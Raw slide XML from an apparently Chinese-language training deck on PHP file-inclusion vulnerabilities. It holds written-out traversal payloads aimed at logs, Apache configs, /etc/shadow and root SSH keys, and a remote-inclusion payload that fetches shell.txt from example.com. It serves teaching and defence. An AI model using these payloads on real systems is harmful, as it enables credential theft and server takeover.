                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：若文件中代码已被包含则不会再次包含</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill>
              <a:effectLst/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D7D2E57-BD23-48BF-8DCB-31ADEB0AEA33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="3059668"/>
            <a:ext cx="1107996" cy="396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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>利用条件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905EB6C-D49D-4EB7-BA8E-3CF1E6ADF33F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669922" y="3677163"/>
            <a:ext cx="9424691" cy="139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>
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>程序用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>include() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>等文件包含函数通过动态变量的范式引入需要包含的文件 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill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r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用户能够控制该动态变量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>注：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>中只要文件内容符合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>语法规范，包含时不管扩展名是什么都会被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>解析， 若文件内容不符合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>语法规范则会以文本方式显示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/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55DE520-4A84-41AE-B20E-F9799756B190}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669922" y="5125655"/>
            <a:ext cx="6096000" cy="139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>
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>漏洞危害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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>执行任意代码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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>包含恶意文件控制网站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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>甚至控制服务器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill>
              <a:effectLst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8027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1B1DA-A369-440B-AE64-006CD17F0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文件包含漏洞分类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8FCD40-BE64-40CA-A172-B4B1BE7B1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fld id="{5DD3DB80-B894-403A-B48E-6FDC1A72010E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>5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964F458-BE84-43AB-99CD-CEA83714D474}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1379320"/>
            <a:ext cx="1107996" cy="396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>
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>漏洞分类</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill>
              <a:effectLst/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876E1B8-34CB-4261-862E-883EFD5582F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="576403" y="1842263"/>
            <a:ext cx="9708333" cy="3387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  <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>本地文件包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRP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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>可以包含本地文件，在条件允许时甚至能执行代码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>上传图片马，然后包含</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>读敏感文件，读 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>包含日志文件 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GetShell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1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B050"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>包含 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>data: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>php://input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>等伪协议</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>若有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>phpinfo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>则可以包含临时文件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  <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>远程文件包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRP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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>可以直接执行任意代码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>要保证 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>allow_url_fopen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>allow_url_include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>要为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>On</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill>
              <a:effectLst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12437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26E6F-6545-4986-A68A-62F46ACA8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文件包含漏洞攻击方式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19CC2C-965A-4287-A241-3640E5F8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fld id="{5DD3DB80-B894-403A-B48E-6FDC1A72010E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>6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4018E3-256C-4CF3-8C92-90599098D0B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1334053"/>
            <a:ext cx="2262158" cy="396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>
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>包含同目录下的文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill>
              <a:effectLst/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6C8DFE8-1BE9-4FDC-B85D-8A68D8343498}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1824072"/>
            <a:ext cx="1717137" cy="3942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888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>?file=.htaccess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2E11770-3FB1-4C5C-B959-AE2CB6E398B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693007" y="2193404"/>
            <a:ext cx="1107996" cy="396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>
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>目录遍历</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill>
              <a:effectLst/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9213E1A-1A92-4955-9367-005A4312AA1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662711" y="2623554"/>
            <a:ext cx="9202431" cy="1725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888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>?file=../../../../../../../../../var/lib/locate.db</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>?file=../../../../../../../../../var/lib/mlocate/mlocate.db</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>中这两个文件储存着所有文件的路径，需要 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)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655E07-08EB-442D-94A5-7B06B8BF4CB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="4394965"/>
            <a:ext cx="1569660" cy="396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>
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>包含错误日志</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill>
              <a:effectLst/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A8F7D5F-F9C1-4428-8F73-FAF83A626006}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="4918639"/>
            <a:ext cx="4897559" cy="3942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888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>?file=../../../../../../../../../var/log/apache/error.log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353971D-F232-4A12-BCF8-FEC9D5ECADCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662711" y="5370824"/>
            <a:ext cx="3531736" cy="396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>
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>获取 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>目录或者其他配置文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill>
              <a:effectLst/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110820F-E181-4539-83C7-3CEAF7E055E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662711" y="6022038"/>
            <a:ext cx="7324286" cy="394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888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>?file=../../../../../../../../../usr/local/apache2/conf/httpd.conf</a:t>
            </a:r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77011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9DA624-59B1-4104-B429-0E13D06C6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系统重要文件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B824A3-DDC3-4DE0-86DF-59875B560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fld id="{5DD3DB80-B894-403A-B48E-6FDC1A72010E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>7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60E4EFB-B3CE-4F7B-9A21-D58AC75145EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1261811"/>
            <a:ext cx="5649395" cy="3385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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/root/.ssh/authorized_keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/root/.ssh/id_rsa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/root/.ssh/id_rsa.keystore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/root/.ssh/id_rsa.pub</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/root/.ssh/known_hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/etc/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/root/.bash_history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/root/.mysql_history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/proc/mounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/proc/config.gz</a:t>
            </a:r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1344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8B9E5C-F5D8-44E5-9163-046075A55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远程文件包含漏洞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B9291A-5E84-4F07-8D37-DE9EE6E4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fld id="{5DD3DB80-B894-403A-B48E-6FDC1A72010E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>8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F2A5B2D-431F-4FEA-8E91-0318130BC191}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624069" y="1145903"/>
            <a:ext cx="8220579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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>普通远程文件包含</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>?file=[http|https|ftp]://example.com/shell.txt</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
